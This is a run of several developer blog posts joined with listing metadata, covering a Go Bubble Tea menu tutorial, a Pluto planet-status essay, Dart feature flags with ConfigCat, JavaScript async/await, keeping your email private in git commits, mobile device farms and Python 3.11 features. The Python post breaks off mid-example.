options: []menuItem{
menuItem{
text: "new check-in",
onPress: func() tea.Msg { return struct{}{} },
},
menuItem{
text: "view check-ins",
onPress: func() tea.Msg { return struct{}{} },
},
},
}
p := tea.NewProgram(m)
if err := p.Start(); err != nil {
panic(err)
}
}
```
For now, onPress is just a no-op that returns an empty struct. Now, let's run our app.
```
go build
./check-ins
```
You should see something like this:

Cool! Now the menu can toggle what's selected! Now let's handle that user input.
## ✅ Handling the enter key and seeing what the tea.Cmd type actually does
So far, we haven't really taken a close look at the `tea.Cmd` type. It's one of the two return values for the `Update` method, but we've only used it so far to exit the app. Let's take a closer look at its type signature.
```go
type Cmd func() tea.Msg
```
A `Cmd` is some sort of function that does some stuff, and then gives us back a `tea.Msg`. That function can be time passing, it can be I/O like retrieving some data, really anything goes! The `tea.Msg` in turn gets used by our `Update` function to update our model and finally our view.
So handling a user pressing the enter key, and then running an arbitrary onPress function, is one such way to use a Cmd. So let's start with an enter button handler.
```diff
case tea.KeyMsg:
switch msg.(tea.KeyMsg).String() {
 	case "ctrl+c":
return m, tea.Quit
case "down", "right", "up", "left":
return m.moveCursor(msg.(tea.KeyMsg)), nil
+ case "enter", "return":
+ return m, m.options[m.selectedIndex].onPress
}
```
Notice that when the user presses enter, we return the model, unchanged, but we **also** return the selected item's `onPress` function. If you recall when we defined the `menuItem` type, the type of its `onPress` field was `func() tea.Msg`. In other words, that exactly matches the `Cmd` type alias!
There's one other thing we need to do inside the `Update` method though. Right now, we're only handling the `tea.KeyMsg` type. The type we're returning for toggling the selected item's capitalization will be a brand new type of `tea.Msg`, so we need to define it, and then add a case to our Update method for it. First, let's define the struct.
```go
type toggleCasingMsg struct{}
```
We don't need any data to be passed in, so our Msg is just an empty struct; if you recall, the `tea.Msg` type is just an empty interface, so we can have a Msg contain as much or as little data as we need.
Now back in the Update method, let's add a case for `toggleCasingMsg`!
First add the method `toggleSelectedItemCase`
```go
func (m menu) toggleSelectedItemCase() tea.Model {
selectedText := m.options[m.selectedIndex].text
if selectedText == strings.ToUpper(selectedText) {
m.options[m.selectedIndex].text = strings.ToLower(selectedText)
} else {
m.options[m.selectedIndex].text = strings.ToUpper(selectedText)
}
return m
}
```
Then add it to the `Update` method.
```diff
func (m menu) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
switch msg.(type) {
+ case toggleCasingMsg:
+ return m.toggleSelectedItemCase(), nil
case tea.KeyMsg:
// our KeyMsg handlers here
```
On a toggleCasingMsg, we update the casing of the selected menu item, and then return the updated model.
Finally, in app.go, let's use our toggleCasingMsg
```diff
menuItem{
text: "new check-in",
- onPress: func() tea.Msg { return struct{}{} },
+ onPress: func() tea.Msg { return toggleCasingMsg{} },
},
menuItem{
text: "view check-ins",
- onPress: func() tea.Msg { return struct{}{} },
+ onPress: func() tea.Msg { return toggleCasingMsg{} },
},
```
Now let's try our app out!
```
go build
./check-ins
```
The app should now look like this:

Note, by the way, that at this stage of the app, this isn't the only way we could have processed enter; we also could have processed all the toggling entirely in the update function, rather than having to process it with a Cmd. The reasons I chose to use a Cmd were:
* To show a simple use case for a non-Quit Cmd in Bubble Tea
* By using a Cmd, we can pass arbitrary event handler functions into our components, a pattern you may recognize if you've coded in React.
Next up, we've got a menu, but it's not very flashy just yet. In the next tutorial, we'll see how to use Bubble Tea to make our app look cool; first by hand, then with Bubble Tea's CSS-like Lip Gloss package! | andyhaskell |
1,228,076 | Will Pluto become a planet again? (RU) | Why is Pluto no longer a planet? In 1978, one of Pluto's moons was discovered --... | 0 | 2022-10-24T05:50:27 | https://habr.com/ru/post/696576/ | astronomy, hobby, science, scipop | ## Why is Pluto no longer a planet?
In 1978, one of Pluto's moons, Charon, was discovered. Beyond the fact that Charon is only 8 times lighter than Pluto, Charon does not orbit Pluto; instead, both bodies orbit a common center of mass. On top of that, Pluto's situation was made worse by the 2005 discovery of Eris, another dwarf planet, one that is even heavier than Pluto.

## The dilemma
This confronted the scientific community with a question: admit Eris into the ranks of planets and risk the list of planets growing ever longer, or exclude Pluto from the list of planets altogether and draw up a complete definition of what a planet actually is.
## So what is a planet, anyway?
So, in 2006 the second option was chosen: exclude Pluto from the list of planets and formulate a definition of a full-fledged planet as such.
There are only 3 criteria for defining a planet:
> **1. The body orbits the Sun.**
_A perfectly logical rule, which excluded the Moon, Ganymede, and the other planetary satellites. The catch is that Pluto does orbit the Sun._
> **2. The body is massive enough to take a spherical shape under its own gravity.**
_Pluto has no problem here either, and neither does the Moon._
> **3. The body has, in the vicinity of its orbit, a "neighborhood cleared of other bodies."**
_This is where the disputes arise: the body must have enough mass to **dominate**, turning all objects in its orbit into satellites._
It is precisely this third point where Pluto falls short. As mentioned earlier, Pluto and Charon orbit a common center of mass, so the orbit is not cleared. And that is how all objects like Eris and Pluto became dwarf planets.
## If there's no doubt, then what is all this about?

I am in no way going to dispute the decision made in 2006; I only want to point out that science has moved on since then, and to offer a few arguments in favor of Pluto the planet.
### 1. Pluto's atmosphere
Pluto is unimaginably far away from us and seems completely lifeless. Yet contrary to appearances, in 2015 the New Horizons probe sent back a photo of a sunset on Pluto. Everyone was surprised to see 20 layers of atmosphere rising up to 1,600 kilometers (even higher than on Earth!). In fact, Pluto is the only trans-Neptunian object that has an atmosphere of its own.

Pluto's atmosphere is 100,000 times thinner than Earth's and consists mainly of nitrogen. Granted, it does not inspire much hope, but its very existence sets Pluto apart from the other candidates.
Even more interestingly, Pluto constantly replenishes its atmosphere with fresh nitrogen, which means that processes unknown to us are running inside it, delivering nitrogen to Pluto's surface.
### 2. Geological activity
All of us (well, almost all) picture Pluto's surface as dead, lifeless, and covered with craters. That is what Eris and Ceres look like: a typical dwarf-planet landscape. But the photos sent by New Horizons say literally the opposite: Pluto has a huge number of mountain ridges, deep depressions, and canyons, and shows every sign of geological activity. Some mountains reach 3 kilometers in height! This indicates that Pluto was still geologically active at least 100 million years ago. Even Mars, our neighbor, ceased to be geologically active long ago.

Of course, all these processes require energy. A lot of energy. On Earth they are powered by the hot core, while for Pluto even sunlight plays almost no role.
According to New Horizons data, it is quite likely that beneath the crust of frozen nitrogen and the rocky surface there is a liquid ocean, which is the best explanation for the cracks on Pluto's surface.
Some scientists believe that, depending on the season, the liquid ocean freezes and thaws again, which literally "tears" the planet apart. Others believe that cryovolcanism exists on Pluto.
### 3. Is the third rule mistaken?

Meet Philip Metzger, Pluto's unofficial "advocate" and a planetary scientist at the University of Central Florida (USA). In a new study published in the journal Icarus, Metzger reports that this standard for classifying planets (clearing the orbit) is not supported by the research literature.
Philip Metzger reviewed scientific papers from the past 200 years and, going back to 1802, found only one publication that used the orbit-clearing criterion to classify planets, and it was based on reasoning that has since been disproven. Moreover, moons such as Saturn's Titan and Jupiter's Europa have routinely been called planets by planetary scientists since the time of Galileo.
"The IAU definition shows that the fundamental object of planetary science, the planet, is defined on the basis of a concept that nobody uses in their research. And it leaves out the second most complex and interesting planet in the Solar System. We have a list of more than 100 examples of planetary scientists using the word 'planet' in a way that does not match the official definition, but they do it because it is functionally useful," says Philip Metzger.
The scientist's opinion is reinforced by the carelessness of the definition itself. The International Astronomical Union never specified what exactly is meant by "clearing the orbit." Taken literally, there are no planets at all, because not one of them can fully and permanently clear its orbit.
## A most elegant conclusion
The Pluto-Charon system satisfies the definition of a **double planet**. At the moment it is the only pair of bodies in the Solar System that can claim such a status. From Pluto's discovery in 1930 right up until 1978, Pluto and Charon were considered one and the same celestial body.
It feels a bit strange to deny _all_ small planets the right to be called planets. Looked at that way, Jupiter also affects the Sun, and their common center of mass lies **outside** the star. So what, should we now strike the Sun from the list of stars just because Jupiter influences it? Of course not. The scientists who made the decision about Pluto in 2006 can be understood: some kind of decision was needed. We have no problems with gas giants like Jupiter or Saturn, but with the small ones there are occasional hiccups.
1,228,164 | Show upcoming meetings for a Microsoft 365 user | Learn how you can build a simple personal assistant in under 10 minutes that'll show a Microsoft... | 0 | 2022-10-24T09:34:19 | https://blog.mastykarz.nl/show-upcoming-meetings-user-microsoft-365/ | javascript, microsoftgraph, beginners, webdev | ---
title: Show upcoming meetings for a Microsoft 365 user
published: true
date: 2022-10-24 09:33:00 UTC
tags: javascript,microsoftgraph,beginners,webdev
canonical_url: https://blog.mastykarz.nl/show-upcoming-meetings-user-microsoft-365/
---

Learn how you can build a simple personal assistant in under 10 minutes that'll show a Microsoft 365 user the meetings they have left for the day.
## Show upcoming meetings for a Microsoft 365 user
Recently, I published an article on freeCodeCamp that shows you [how you can build in **just 10 minutes** a simple personal assistant that shows upcoming meetings for the signed-in user](https://www.freecodecamp.org/news/how-to-show-upcoming-meetings-for-a-microsoft-365-user/).

Showing upcoming meetings is a common scenario when integrating Microsoft 365 in work applications. It shows you how to get information from the user's calendar and check their availability for a particular time slot. And it's also a great way to get started with building apps on Microsoft 365.
The tutorial shows you the basics of setting up auth in a single-page app and using the Microsoft Graph JavaScript SDK to connect to the Microsoft Graph API. It also demonstrates working with calendar views and formatting dates.
Give it a try, and I'm looking forward to hearing what you think. | waldekmastykarz |
1,228,462 | How to release features from your Dart application using feature flags | When you take your software products offline to add new features, users can become frustrated,... | 0 | 2022-10-24T15:22:16 | https://configcat.com/blog/2022/10/18/feature-flags-in-dart/ | featureflags, dart, configcat, featuremanagement | When you take your software products offline to add new features, users can become frustrated, especially if their livelihood depends on it. With a new feature, there is always the risk of introducing unanticipated bugs. By incorporating feature flagging into our software release workflow, we can prevent and even lessen these situations.
## What are feature flags?
Imagine your company developing a new component or feature for an existing app. By using a feature flagging mechanism, you can tag that component, and then you can easily enable or disable the new feature within a conditional statement, without redeploying the application.
## Feature flagging in Dart
Now that we have discussed what feature flags are, let's look at how we can implement them in Dart. I have created a [sample app](https://github.com/configcat-labs/feature-flags-in-dart-sample) that you can use to follow along.
Here are the key prerequisites you'll need to start:
### Pre-requisites
- Dart SDK version: 2.17.6 - The installation instructions for your specific operating system can be found [here](https://dart.dev/tutorials/web/get-started#2-install-dart).
- A Dart compatible IDE/Editor - e.g. Visual Studio Code or any other IDE supported by Dart from this [list](https://dart.dev/tools#ides-and-editors).
- Basic knowledge of HTML and Dart
### Using the sample app
**1.** Clone the [GitHub repository](https://github.com/configcat-labs/feature-flags-in-dart-sample).
**2.** Run the following command to build and serve the app:
```sh
webdev serve
```
**3.** You should be able to view the app in your browser by visiting [http://localhost:8080/](http://localhost:8080/).

Think of the thumbnail converter shown above as the new feature to be rolled out. We can create a feature flag for it using a cloud-hosted feature flag service like [ConfigCat](https://configcat.com/).
### Integrating with ConfigCat
**1.** To start using ConfigCat, you'll need to [sign up for a free account](https://app.configcat.com/signup).
**2.** In the dashboard, start by creating a new product, then an environment, and finally a configuration. Afterward, create a feature flag that contains the following information:

**3.** Install ConfigCat's Dart SDK client into your Dart app with the following command:
```sh
dart pub add configcat_client
```
This will install the required functionality our Dart app will need to establish a connection to the feature flags you created in your ConfigCat dashboard.
**4.** In your dart file (or in the **main.dart** file if you're using the sample app provided), import the SDK in the following manner:
```sh
import 'package:configcat_client/configcat_client.dart';
```
**5.** Create the client with your SDK key:
```dart
final client = ConfigCatClient.get(
sdkKey: '<YOUR_SDK_KEY>', // <-- Add your SDK Key here for your environment.
);
```
By setting your SDK key, the Dart SDK can query your account for feature flags and their statuses. Generally, you should keep this key secure and not upload it to your code repository.
**6.** Create a variable called **canShowThumbnailConverter**. The client SDK we installed will keep this variable in sync with the status of the feature flag in your ConfigCat dashboard.
```dart
final canShowThumbnailConverter = await client.getValue(
key: 'canshowthumbnailconverter', defaultValue: false);
```
The variable created above returns a boolean value which can be used in a conditional statement to enable and disable the component.
To hide the new feature component by default, I've added the hidden HTML attribute to it. This attribute can be set or unset based on the value of the **canShowThumbnailConverter** variable, as shown below:
```dart
// If the flag is switched on
if (canShowThumbnailConverter) {
// Show the thumbnailConverterElement by removing the hidden attribute
thumbnailConverterElement.hidden = false;
} else {
// Show the featureNotAvailableElement by removing the hidden attribute
featureNotAvailableElement.hidden = false;
}
```
The final version of the **main.dart** file can be found [here](https://github.com/configcat-labs/feature-flags-in-dart-sample/blob/master/web/main.dart).
### Let's try this in a demo
1. Head over to the ConfigCat dashboard and **turn off** the feature flag:

2. Refresh the page, and you should now see the **featureNotAvailableElement** component instead:

As a bonus tip when working with feature flags, it is even possible to target smaller user segments based on their demographics and personal characteristics. An example of this could be releasing a new feature to French users over the age of twenty-three. This is incredibly useful in situations where you do not want the new feature to be available to all users.
## Final thoughts
The process of making software updates and feature rollouts shouldn't be difficult for developers. In my experience, feature flags are crucial to the rollout of features, canary deployments, and A/B tests. They always seem to be able to save the day and can be used in [many languages and frameworks](https://configcat.com/docs/sdk-reference/overview/). If you haven't adopted them yet, I highly recommend you give them a try.
## Stay in the loop
Stay on top of the latest posts and announcements from ConfigCat on [Twitter](https://twitter.com/configcat), [Facebook](https://www.facebook.com/configcat), [LinkedIn](https://www.linkedin.com/company/configcat/), and [GitHub](https://github.com/configcat).
| codedbychavez |
1,228,702 | How to effectively utilize Promise in JavaScript using Async/Await | JavaScript supports three approaches to handling asynchronous operations. The first approach... | 0 | 2022-10-25T19:42:29 | https://dev.to/efkumah/how-to-effectively-utilize-promise-in-javascript-using-asyncawait-5hlc | javascript, webdev, beginners, programming | JavaScript supports three approaches to handling asynchronous operations.
The first approach involves using callback functions. In this approach, when an asynchronous operation completes, a callback function that was passed as an argument is invoked.
See the code below:
```
function callbackFn(){
//execute when the async operation completes
}
// pass callbackFn as an argument
asyncOperation(callbackFn)
```
Using this approach results in callback hell, which creates complex, difficult-to-read, and error-prone applications as you nest callbacks into callbacks.
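As a small illustration (the `step` helper is hypothetical, and it invokes its callback directly to keep the sketch simple; in a real app each step would be a network call or timer), dependent steps quickly nest:

```javascript
// Hypothetical step: computes a value and hands it to the next callback
function step(value, callbackFn) {
  callbackFn(value + 1);
}

// Each result feeds the next step, nesting callbacks deeper and deeper
step(0, (a) => {
  step(a, (b) => {
    step(b, (c) => {
      console.log(c); // 3
    });
  });
});
```

With more steps, the indentation keeps growing, which is exactly the "pyramid" shape that makes callback hell hard to read.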
To handle asynchronous operations effectively, JavaScript introduced `promises` to solve the issue with callback hell.
A `Promise` is an object that serves as a placeholder for the future result of an asynchronous operation and represents our operation's current state.
When the asynchronous operation completes, a fulfilled promise object is returned. We then use the `then()` method on the promise object to utilize the result.
The syntax is as below:
```
const promise = asyncOperation()
promise.then(result => console.log(result))
```
`Promises` introduced a significant improvement in handling asynchronous operations and solved the challenge of callback hell.
The only problem is that Promises require a series of `then()` calls to consume any returned Promise object, which increases the wordiness of our code.
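For instance, a hypothetical promise-returning `step` helper that resolves with `value + 1` needs one `then()` per dependent step:

```javascript
// Hypothetical async step that resolves with value + 1
const step = (value) => Promise.resolve(value + 1);

// Each dependent step adds another then() to the chain
step(0)
  .then((a) => step(a))
  .then((b) => step(b))
  .then((c) => console.log(c)); // logs 3
```

The chain stays flat, which is better than nested callbacks, but every additional step still costs another `then()`.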
`async/await` was introduced in ES2017 as a better approach to handling `Promises`
In this post, we will learn how to use `async/await` to utilize `Promise`.
By the end of this article, you will learn:
- Why async/await is referred to as syntactic sugar
- How to declare an async function
- What is the async keyword
- What is the await keyword
- Difference between consuming Promises using .then() vs async/await
- The benefits of using async functions
- How to handle errors in an async function
Let's get started !
## Understanding Syntactic Sugar
`async/await` is referred to as syntactic sugar for Promises, but what does this really mean? Syntactic sugar is syntax within a programming language implemented to make code easier to read or express.
Rather than using promise chaining, we can use async/await to write well-structured code.
The code below looks well-structured and devoid of wordiness.
```
async function getSomeData(){
const response = await fetch('https://jsonplaceholder.typicode.com/posts')
const data = await response.json()
console.log(data)
}
//call the asynchronous function
getSomeData()
```
## Understanding the Async keyword
The `async` keyword tells the JavaScript engine that we are declaring an asynchronous function.
Using the `async` keyword before a function automatically makes it return a `Promise`. In other words, the return value of an async function will always be a Promise.
If the returned value of an async function is not explicitly a promise, it will be silently wrapped in a promise.
See the code below :
```
async function someAsyncOps(){
}
//call the asynchronous function
console.log(someAsyncOps())
```
The output of the code will be

- There is no return value in the body of the function above. However, because of the `async` keyword, the returned value is still a `Promise`.
To reiterate, when the `async` keyword is used before any function, the return value is a `Promise`. This promise will be settled with the value returned by the async function, or rejected with an exception thrown from the async function.
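A quick sketch of both outcomes (the function names here are ours, for illustration):

```javascript
// The async keyword wraps a returned value in a resolved Promise...
async function succeed() {
  return 'done';
}

// ...and turns a thrown exception into a rejected Promise
async function fail() {
  throw new Error('oops');
}

succeed().then((value) => console.log(value)); // logs: done
fail().catch((err) => console.log(err.message)); // logs: oops
```

Because both paths produce a Promise, callers can always use `then()`/`catch()` (or `await` with try/catch) regardless of which outcome occurs.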
## Syntax of the Async function
We define the async function using either the regular function declaration or an arrow function.
The syntax of the async function is as below:
```
//function declaration
async function someAsyncOps(){
await ... //some async operation goes here
}
//arrow declaration
const someAsyncOps = async ()=>{
await ... //some async operation goes here
}
```
## Understanding the Await keyword
When an `await` expression is used, the execution of an async function is paused until the promise settles (is fulfilled or rejected); the promised result is then returned, and execution resumes.
When resumed, the value of the `await` expression is that of the fulfilled promise.
The `await` keyword works only in the body of an async function. It prompts the JavaScript engine to wait for the asynchronous operation to complete before continuing with any statement below it in the function's body.
It works as a **pause-until-done** keyword, causing the JavaScript engine to pause code execution until the Promise is settled.
The syntax is as below:
```
//should be used inside an async function
let value = await promise //wait until promise is settled
```
Examine the code below:
```
async function someAsyncOps(){
//use Promise constructor
let promise = new Promise((resolve, reject)=>{
setTimeout(() => resolve('done'),4000)
});
let result = await promise; // (*) wait until promise settles
console.log(result)
console.log("Will resume execution when promise settled")
}
someAsyncOps()
```
In the code above:
The function execution "pauses" at the line (*) waiting for the promise to settle. Using setTimeout to simulate a delay, the promise takes about 4 seconds to settle. Once the promise settles, the fulfilled value is assigned to the result variable. After that, any statement below that line of code will be executed.
To emphasize, await suspends the function execution until the promise settles, and then resumes it with the promised result.
It is used as an alternative to promise handling rather than the `.then()` method.
## Inside the Async function's body
An async function's body can be thought of as being divided by zero or more await expressions.
**Top-level code is executed synchronously** and includes the first await expression (if there is one).
This way, an async function without an await expression will run synchronously. The async function will, however, always complete asynchronously if there is an await expression inside the function body.
Run the code snippet below to see this in action:
```
async function someAsyncOps(){
console.log("Top level code will execute first ") //executed synchronously
//use Promise constructor
let promise = new Promise((resolve, reject)=>{
setTimeout(() => resolve('done'),4000)
});
let result = await promise; //wait until promise settles, hence run asynchronously
console.log(result)
console.log("Code below will resume execution now that the promise has settled")
}
//invoke the function
someAsyncOps()
```
The output will be

## Benefits of Async/Await
With an async function, the JavaScript engine pauses code execution when it encounters the await expression, and only resumes when the promise is fulfilled.
The code below uses the async function:
```
async function someAsyncOps(){
console.log('Async/Await Readying...')
let response = await fetch('https://dummyjson.com/products/1')
let result = await response.json() // pause code execution until promise is fulfilled
console.log(result)
console.log('This will only execute when the promise is fulfilled')
}
someAsyncOps()
```
The output will be:

However, the `.then()` method does not pause any code execution. Code below the promise chaining will execute before the promise is fulfilled.
The code below uses promise chaining:
```
function getData(){
console.log('Then method reading....')
fetch('https://dummyjson.com/products/1').then((res)=> console.log(res))
console.log('This will not pause, but will be executed before the promise is fulfilled');
}
getData()
```
The output will be

If we utilize promise chaining with `then()`, any logic we want to **execute after the request** must be implemented inside the promise chain. Otherwise, as in the example above, any code placed after `fetch()` will execute **immediately**, before the `fetch()` is done.
`Async/Await` also makes it simple to convert code from synchronous procedure to asynchronous procedure.
## Handling errors in an Async function
Error handling in async functions is very effortless. If the promise is rejected, we use the `.catch()` method to handle it.
Because async functions return a promise, we can invoke the function, and append the `.catch()` method to the end.
```
//handling errors in async functions
asyncFunctionCall().catch(err => {
console.error(err)
});
```
Similarly to synchronous code, if you want to handle the error directly inside the async function, we can use `try/catch`.
The `try...catch` statement is composed of a `try` block and either a `catch` block, a `finally` block, or both. `try` block code is executed first, and if it throws an exception, `catch` block code is executed.
See the code below:
```
async function someAsyncOps(){
try {
let response = await fetch('https://jsonplaceholder.typicode.co') //api endpoint error
let result = await response.json()
console.log(result)
} catch (error) {
console.log("We got some error",error) //catches the error here
}
}
someAsyncOps()
```
The output of the code will be:

## Summary
- Using the `async` keyword before a function makes the function automatically return a `Promise`.
- When an `await` expression is used, execution of the async function is paused until the promise settles (is fulfilled or rejected); the `await` then returns its result and execution resumes.
- Although `await` pauses the async function (and is valid only inside one), it does not block the main thread from executing.
- With `async/await` we rarely need to write `promise.then/catch`
- These features make writing both readable and writable asynchronous code a breeze.
Please do comment or add your feedback, insight, or suggestion to this post. It helps clarify any concerns you might have and makes the article better.
If you have found value in this article, kindly share it on your social media platforms, and don't forget to connect with me on [Twitter](https://twitter.com/emmanuelfkumah) | efkumah |
1,229,323 | Keep your email safe on github | I recently decided to take a trip to the spam box in my email, I didn't expect much to be there.... | 0 | 2022-10-25T13:28:05 | https://dev.to/imagineeeinc/keep-your-email-safe-on-github-9c5 | git, github, privacy | I recently decided to take a trip to the spam box in my email, I didn't expect much to be there. Until I saw a single email that stood out.
The email was as follows:
> Hey
>I was just on your Github (went down a Wednesday morning rabbit hole and came up in Monaco Editor stargazers) and loved the profile.
> [Insert product advertisement here]
I was like "oh cool product, but not interested" in my head. But then something didn't feel right: how did this person send an email to my personal email, which isn't publicly visible on my GitHub? I checked my account and it was private. I then thought it may be my portfolio that's linked there, but no. Maybe my Twitter, but also no.
Then it dawned on me. Git commits have your email.
I immediately did some quick research online: git apparently keeps your email when you commit. So I checked my local environment, and what did I find? My personal email. I don't know how or when I gave it my personal email, but it's there.
So here's what I did, and what I feel you should do yourself if you commit to GitHub or any public repository and value your privacy. Based on [this page from github](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-personal-account-on-github/managing-email-preferences/setting-your-commit-email-address#setting-your-email-address-for-every-repository-on-your-computer), you should change your email using the command below on any machine from which you commit:
```shell
git config --global user.email "YOUR_EMAIL"
```
Where the `YOUR_EMAIL` bit should be the noreply email GitHub provides; it should be somewhere in your [email settings](https://github.com/settings/emails) in your account.
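As a quick sanity check after setting it (the address below is just a hypothetical placeholder — use the actual noreply address from your own settings page):

```shell
# Set the commit email to the GitHub-provided noreply address (placeholder value)
git config --global user.email "1234567+your-username@users.noreply.github.com"

# Print the email git will stamp on future commits, to confirm the change
git config --global user.email
```

Note this only affects new commits; emails already baked into past commits stay in the history.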
I hope you find this post informative, and if you have any thoughts or insights on this matter, do comment below. Thanks for reading. | imagineeeinc |
1,229,327 | Why Device Farms for App Testing? | The smartphone market is huge with almost everyone owning a phone. To cater the larger customer base,... | 0 | 2022-10-25T12:44:46 | https://dev.to/kavithar/why-device-farms-for-app-testing-2j1g | The smartphone market is huge with almost everyone owning a phone. To cater the larger customer base, smartphone companies are releasing the same phone model in different versions of screen size, resolution, and cost. This is the perfect business strategy to cover a wider customer base and sell the product, however, releasing different versions of the same phone faces challenges when it comes to testing apps across all the devices. With nearly 24000 models of Android phones alone, investing on devices for testing is not a feasible option. Further, virtual devices like emulators and simulators are used as an alternative but they don’t provide accurate results as expected. Hence, the question is how to efficiently test apps across all the devices in a cost-effective manner?
The issues arising due to different screen sizes, resolutions, and operating systems are known as fragmentation, and they are found more in Android than in iOS devices due to the huge number of Android phones available in the market. A Device Farm, or Device Cloud, is the most advanced solution to address the issues of fragmentation and offer accurate test results across all the devices without costing you much.
There are plenty of test automation tools available in the market that test the app for fragmentation and other functional and non-functional aspects. One such testing platform for web and mobile apps is [Tenjin Online](https://tenjinonline.com/), which has integrated a Device Farm for testing the app beyond fragmentation. It is a SaaS-based platform, simple and codeless, that has the capability to test all the functional and non-functional features of the app and offer consistent, accurate, and efficient outcomes.
**Device Farms for Testing Apps**
Extensive parameterization and customization of the Android ecosystem has led to serious fragmentation issues. Device Cloud, otherwise known as a Device Farm, delivers an efficient solution to test apps across fragmented systems by giving access to real devices and web browsers over the Cloud. It cuts the cost of purchasing all the devices needed to test the app and reduces the unaddressed issues arising on virtual testing platforms like emulators and simulators. In a Device Farm, the tester gets access to a wide range of devices, allowing them to efficiently conduct cross-device tests, which were highly challenging before the introduction of Device Farms.
A Device Farm is a testing environment that offers access to a wide range of devices for both legacy systems and upgraded versions. It supports virtual devices such as emulators and simulators allowing testing over Cloud, and also provides access to real devices. It has multiple browsers, operating systems, and devices from different manufacturers. It allows the tester to detect all functional and non-functional errors, allowing to even conduct both manual and automated testing.
**Benefits of Device Farms**
- Device Farm offers access to a wide range of devices
- Testing during scaling is easier with Cloud-based Device Farm
- Device management is easy with Device Farm
- Real-time shared access is available across all team
- Access to data at anytime and anywhere
- It is cost-effective
The introduction of Device Farms has tremendously helped the testing fraternity by offering accurate, efficient, and faster results. Prior to Device Farms, it was extremely difficult for testers to understand where the problems lay. Most of the testing was performed based on guesswork, presuming the app would perform in a particular manner on a particular device. Though virtual devices helped to a certain level, Device Farms are no less than a revolution, offering ease and speed for testing.
As new devices are being released into the market, the smartphone business is increasing like never before. To ensure app quality across this huge number of smartphone devices, incorporating Device Farms is the most feasible option. It offers the best testing solution across all the devices while fitting perfectly in your budget. It allows developers to run code across multiple devices efficiently and offers accurate results. This is by far the best solution for testing mobile apps.
## **Conclusion**
App testing across all the devices is an essential part of the QA process that decides the app's success in the market. This step improves the app's functioning on all the devices and helps enhance app quality across the board. Device Farms ease the app's testing process, making it efficient and quicker. The trend of the Device Farm, or Device Cloud, has changed the course of how app testing is done by incorporating device availability, real-time access, and improved efficiency. It has gained immense popularity by offering efficient and cost-effective testing solutions. It may further see advanced AI/ML integrations to multiply the benefits and yield the maximum out of it.
| kavithar | |
1,229,680 | 7 Python 3.11 new features 🤩 | Python 3.11 has been out since October 25 and comes with great new features! Here are my top... | 0 | 2022-10-26T12:00:00 | https://blog.derlin.ch/7-python-311-new-features | python, news, programming | [Python 3.11](https://docs.python.org/3.11/whatsnew/3.11.html) has been out since October 25 and comes with great new features! Here are my top picks.
**Covered in this article**:
* Adding notes to exceptions
* Better tracebacks
* `Self` type
* `StrEnum`, `ReprEnum` and other enum improvements
* New `logging.getLevelNamesMapping()` method
* [TOML](https://github.com/toml-lang/toml) built-in support
* (🤔 `LiteralString` ??)
See all other features on [What’s New In Python 3.11](https://docs.python.org/3.11/whatsnew/3.11.html) !
-----
**🚀🚀🚀🚀 speed improvements**: Python 3.11 is supposed to be way faster, thanks to improvements from [Faster CPython](https://docs.python.org/3.11/whatsnew/3.11.html#whatsnew311-faster-cpython) project:
> *Python 3.11 is between 10-60% faster than Python 3.10. On average, we measured a 1.25x speedup on the standard benchmark suite.*
It won't be the focus of this article, but if you are interested you should be able to find many benchmarks and details online 🤓
------
## Adding notes to exceptions
From the release notes:
> *The `add_note()` method is added to `BaseException`. It can be used to enrich exceptions with context information that is not available at the time when the exception is raised. The added notes appear in the default traceback.*
For example:
```python
if __name__ == "__main__":
try:
try:
raise TypeError("bad type")
except TypeError as type_error:
type_error.add_note("Some information")
raise
except TypeError as type_error:
type_error.add_note("And some more information")
raise
```
This will output:
```python
Traceback (most recent call last):
File "/app/notes.py", line 4, in <module>
raise TypeError("bad type")
TypeError: bad type
Some information
And some more information
```
## Better tracebacks
Staying on the exception topic, tracebacks are enriched to show the exact expression that caused the error. This is especially useful when a lot is going on on a single line.
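For context, a hypothetical `distance.py` along these lines would produce the traceback shown below (the `Point` class here is an assumed reconstruction, not code from the original post):

```python
from dataclasses import dataclass

@dataclass
class Point:
    x: int
    y: int

def manhattan_distance(point_1, point_2):
    return abs(point_1.x - point_2.x) + abs(point_1.y - point_2.y)

print(manhattan_distance(Point(0, 0), Point(3, 4)))  # prints 7

# Passing None instead of a Point reproduces the AttributeError below,
# with carets pinpointing exactly which attribute access failed:
# print(manhattan_distance(None, Point(3, 4)))
```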
```python
Traceback (most recent call last):
File "distance.py", line 11, in <module>
print(manhattan_distance(p1, p2))
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "distance.py", line 6, in manhattan_distance
return abs(point_1.x - point_2.x) + abs(point_1.y - point_2.y)
^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'x'
```
## `Self` type
When using type hints, it has always bothered me not to be able to refer to the current class without importing some `__future__`. There is now, *finally*, a `Self` type that can be used !
This is Python 3.10:
```python
from __future__ import annotations # this is necessary ...
class Point:
def __init__(self, x: int, y: int):
self.x = x
self.y = y
@classmethod
def origin(cls) -> Point: # .. for this to compile
return cls(0, 0)
```
With Python 3.11:
```python
from typing import Self # now, import Self
class Point:
# ...
@classmethod
def origin(cls) -> Self: # and use it instead of Point
return cls(0, 0)
```
This makes it easy to rename the `Point` class to anything, and makes the code more readable.
## `StrEnum`, `ReprEnum` and other enum improvements
The enum module has a new class, `StrEnum`, especially for enums with string values. With it, `auto()` yields the lower-cased member name, which avoids painful repetition.
The new `verify()` decorator lets you enforce various constraints such as `UNIQUE`, and - for integer values only - `CONTINUOUS` and `NAMED_FLAGS`. See [`EnumCheck`](https://docs.python.org/3.11/library/enum.html#enum.EnumCheck) for details. I hope they will add more in a future version.
Finally, `IntEnum`, `IntFlag` and `StrEnum` now inherit from `ReprEnum`, which makes their `str()` output the member's value instead of the usual `ClassName.MEMBER` form.
```python
from enum import StrEnum, verify, UNIQUE, auto
@verify(UNIQUE)
class Color(StrEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
if __name__ == "__main__":
print(Color.RED) # prints "red" instead of "Color.RED"
print(f"my color is {Color.BLUE}") # prints "my color is blue"
print("green" == Color.GREEN) # print "True"
```
## New `logging.getLevelNamesMapping()` method
This is a detail, but I can't count how often I had to manually list the logging levels available in my `argparse` choices for command line tools...
Python 3.11 finally provides this mapping for us, using `getLevelNamesMapping()`. Here is how I would typically use it:
```python
import argparse, logging
if __name__ == "__main__":
# Get the logging levels available ...
levels = logging.getLevelNamesMapping()
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--level",
